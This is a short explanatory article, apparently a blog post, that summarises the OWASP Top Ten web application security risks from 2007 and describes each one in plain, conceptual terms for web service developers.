SOA vulnerabilities

Web Services have largely the same vulnerabilities as other Web applications. Since the application is often available over the internet, there are a lot of things you need to do to protect. But Web services also are having other systems communicating with them, so there is also a need to manage security that way.


The website owasp.org addresses security issues for Web applications. There are tips and articles on a wide variety of security issues. There are articles about how to protect against intrusion, there are tools and procedures to make your own security briefings, etc.. This is a source of both security experts and ordinary users who are interested in security and realize the importance of this. They publish, among other things, a list of the most common security risks of Web applications. The list below is the latest stable version (published 2007). The one before was for 2004.

  • Cross Site Scripting (XSS)
  • Injection Flaws
  • Malicious File Execution
  • Insecure Direct Object Reference
  • Cross Site Request Forgery (CSRF)
  • Information Leakage and Improper Error Handling
  • Broken Authentication and Session Management
  • Insecure Cryptographic Storage
  • Insecure Communications
  • Failure to Restrict URL Access

 

At the top we find cross site scripting, also known as XSS, which is the most common vulnerabilities. This attack is to ensure that for example the visitor to a site may rteceive malicious code into the browser. This code is then used by the attacker, for example,  to take over the session and pretend that the attacker is the that user.


Injection flaws, the most common is SQL injection, means that the attacker would manage to get malicious code to be handled by the system, eg an SQL call to the database. If not prevented the code may be processed by the system, eg answer back to the attacker with the users that are in the database.

Malicious file execution means that the system handles files or file names directly from the attacker where the file can be used to attack the system.


Insecure Direct Object reference means that the attacker can see an internal path to e.g. a file, an URL or a database. This can be used to attack the internal system or anything else that the attacker can figure out using the involuntarily disclosed information.


Cross site request forgery means that the attacker has taken control of a browser that is logged in to a website.


Information leakage and improper error handling means that applications leak information about eg their configuration or interconnections. Examples are stacktrace or information about the failure of SQL statements. By this, an attacker could use the information for other attacks.


Broken authentication and session management means that the attacker managed to obtain a session cookie, certified or otherwise, to "steal" the victim's identity.


Insecure Cryptographic Storage. By taking advantage of weak encryption to protect stored data, the attacker could get over protected information.


Insecure Communications - transmitted data is not protected by encryption.


Failure to Restrict URL Access. Information is often protected only through the links being hidden to those who are not authorized. By directly requesting the URL:s the attacker could still access the protected information.

There is a special Top Ten list that focuses exclusively on Java.